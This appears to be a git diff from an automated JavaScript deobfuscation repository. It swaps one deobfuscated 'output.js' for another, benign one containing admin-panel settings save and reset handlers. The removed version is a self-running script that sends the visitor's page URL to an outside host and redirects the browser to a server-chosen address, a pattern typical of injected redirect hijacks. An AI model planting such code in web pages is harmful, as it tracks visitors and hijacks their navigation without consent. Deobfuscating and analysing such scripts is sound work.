diff --git a/output.js b/output.js
index 102168b..dad103b 100644
--- a/output.js
+++ b/output.js
@@ -1,21 +1,36 @@
-//Fri Apr 18 2025 06:59:06 GMT+0000 (Coordinated Universal Time)
+//Fri Apr 18 2025 08:09:25 GMT+0000 (Coordinated Universal Time)
//Base:https://github.com/echo094/decode-js
//Modify:https://github.com/smallfawn/decode_action
-!function () {
- var _0x4bfbca = new XMLHttpRequest(),
- _0x51ae6e = {
- "link": window.location.href,
- "path": window.location.href.replace(window.location.origin, "")
- },
- _0x5d1321 = "https://www.baidu.com/";
- _0x4bfbca.open("POST", "https://ff.up.gnzrmyy.cn/api/url/info");
- _0x4bfbca.setRequestHeader("Content-Type", "application/json");
- _0x4bfbca.send(JSON.stringify(_0x51ae6e));
- _0x4bfbca.onreadystatechange = function () {
- if (4 === _0x4bfbca.readyState && 200 === _0x4bfbca.status) {
- var _0x2c013e = JSON.parse(_0x4bfbca.response);
- if (0 === _0x2c013e.code) return window.location.href = _0x2c013e.data.url, undefined;
+function text() {
+ layer.msg("正在提交", {
+ "time": 5000000
+ });
+ $.ajax({
+ "type": "POST",
+ "data": $("#configform").serialize(),
+ "url": "index.php?act=setting",
+ "success": function (_0x17e5d2) {
+ layer.msg("保存完成", {
+ "time": 1000
+ });
}
- window.location.href = _0x5d1321;
- };
-}();
\ No newline at end of file
+ });
+}
+function reset1() {
+ layer.confirm("确定要还原设置吗?", {
+ "title": "提示"
+ }, function () {
+ {
+ $.ajax({
+ "type": "POST",
+ "data": $("#configform").serialize(),
+ "url": "index.php?act=reset",
+ "success": function (_0x414a35) {
+ layer.msg("还原完成", {
+ "time": 1000
+ });
+ }
+ });
+ }
+ });
+}
\ No newline at end of file
diff --git a/output.py b/output.py
index 715b02e..fa928d1 100644
Binary files a/output.py and b/output.py differ